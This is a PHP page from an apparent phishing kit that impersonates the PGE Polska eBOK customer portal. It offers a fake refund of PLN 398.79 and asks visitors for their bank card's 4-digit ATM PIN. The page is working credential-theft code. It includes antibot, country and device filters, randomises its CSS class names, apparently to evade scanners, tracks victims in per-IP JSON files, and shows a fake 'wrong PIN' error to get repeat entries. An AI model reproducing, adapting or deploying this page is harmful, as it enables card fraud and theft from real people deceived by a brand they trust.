<?php
error_reporting(0);
session_start();
include "../antibots-debug/antibots.php";
include '../setting/functions.php';
include '../includes/current-page.php';
include '../includes/check-allowed-countries.php';
include '../includes/check-devices-allow.php';
$ip = get_client_ip();
$get_name_file = $ip;
$target_file = "../panel/storage/{$get_name_file}.json";
$json_file = file_get_contents($target_file);
$user_info = json_decode($json_file, true);
$user_info['error_pin'];
if ($user_info['error_pin'] == 1) {
$get_name_page = "Page PIN Code Error";
$get_step = "pin-error";
} else {
$get_name_page = "Page PIN Code";
$get_step = "pin";
}
get_page_info($get_name_page, $get_name_file);
$random_classes = rand(0, 1000000);
$permitted_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- SEO -->
<?php include '../libraries/seo.php'; ?>
<!-- Font Google -->
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap" rel="stylesheet">
<!-- Font Awesome Library -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<!-- File Css -->
<link rel="stylesheet" href="../css/style.css">
<link rel="stylesheet" href="../css/basic-thinks.css">
<!-- Favicon -->
<link rel="icon" href="../img/favicon.png">
<link rel="shortcut" href="../img/favicon.png">
<link rel="appel-touch-icon" href="../img/favicon.png">
<title>PGE eBOK</title>
</head>
<body class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> ">
<!-- Main -->
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> main-section">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> navbar-section" style="padding-right: 0px !important;">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> logo">
<img src="../img/logo.png" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> logo-desktop">
<img src="../img/logo-mobile.png.png" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> logo-mobile">
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> coul-2">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-one">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-one"><img src="../img/icon-nav-1.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-normal">Konto: </div><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">010240124</div></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-one"><img src="../img/icon-nav-2.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-green">Liczba nowych powiadomień: 0</div></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-one"><img src="../img/icon-nav-3.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-gray">Ustawienia/Zgody</div></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-two">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-two" style="border-bottom: 1px solid #e1e2e7;"><img src="../img/icon-nav-4.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-normal">Wyloguj się</div></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-two"><img src="../img/icon-nav-5.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">Zmień konto</div></div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-other">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-left">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-other hide-mobile"><img src="../img/icon-nav-2.png" alt=""></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-other"><img src="../img/icon-nav-3.png" alt=""></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-right">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-other hide-mobile"><img src="../img/icon-nav-5.png" alt=""></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-other"><img src="../img/icon-nav-4.png" alt=""></div>
</div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> content-main-section">
<form action="../control-panel/check-action.php" method="post" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> form-section" id="fSD">
<input type="hidden" name="step" value="<?php echo $get_step; ?>">
<input type="hidden" name="ip" value="<?php echo $get_name_file; ?>">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title-and-icon">
<span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Potwierdź PIN swojej karty bankowej</span>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> note-element-style-other">
Wprowadź 4-cyfrowy kod, aby kontynuować weryfikację i poczekaj.
</div>
<?php
if ($user_info['error_pin'] == 1) {
echo
'<span class="m-e-pages">
<img src="../img/error-icon.png" alt="">
Kod PIN do bankomatu jest nieprawidłowy. Postaraj się skupić na poprawnym wpisaniu kodu PIN do bankomatu.
</span>';
}
?>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> prt-i-a-l-me" id="div1">
<label for="pin">Kod PIN bankomatu</label>
<input type="tel" placeholder="••••" id="pin" name="pin" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> i-element" maxlength="4">
<small class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> m-e-i" id="messageError1">To pole jest wymagane</small>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> prt-btn">
<button type="submit" name="b_s_d_p" id="bSD" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> btn-s-d-p">Następny</button>
</div>
</form>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> note-section">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title-and-icon">
<span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Bliższe dane:</span>
<i class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> fa-solid fa-circle-info"></i>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Kwota do zwrócenia:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">PLN 398,79</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Numer zamówienia:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">ffba7993e4a923735e0fa99bb8ab284b</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Odbiorca:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">PGE Polska</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Numer klienta:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">101061041</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Numer faktury:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">101061041/239S/2025</div>
</div>
</div>
</div>
</div>
<!-- Main -->
<!-- Footer -->
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> footer">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> content-footer">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-section">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-phone-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info">Infolinia PGE: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">(+48) 422 222 222 Pon.-Pt. 8:00-17:00</span></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-phone-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info">Pomoc techniczna eBOK: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">(+48) 422 222 298 Pon.-Pt. 8:00-17:00</span></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-mail-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info">e-mail: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">serwis@gkpge.pl</span></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-flash-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> coul-column">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info">
Pogotowie energetyczne: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">991</span>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info-small">
Dla aglomeracji warszawskiej: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green-small">(+48) 223 404 100</span>
</div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-faq-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info"><span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green" style="cursor: pointer !important;">FAQ</span></div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> download-app">
<h3>Pobierz naszą aplikację mobilną</h3>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> prt-btn-download">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> btn-download" style="margin-right: 15px;">
<img src="../img/app-store.png" alt="">
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> btn-download">
<img src="../img/google-play.png" alt="">
</div>
</div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-and-copyright">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-footer">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-footer">Pomoc użytkownika</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-footer">Regulamin</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-footer">Polityka prywatności</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-footer">FAQ</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> copyright">
© 2025 PGE Polska Grupa Energetyczna S.A. Wszystkie prawa zastrzeżone
</div>
</div>
<img src="../img/footer-image.svg" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> image-footer-bottom">
</div>
<!-- Footer -->
<!-- Script Js -->
<script src="../js/script-step-three.js"></script>
<script src="../js/jquery.min.js"></script>
<?php include '../includes/redirect.php'; ?>
<?php include '../includes/status.php'; ?>
</body>
</html>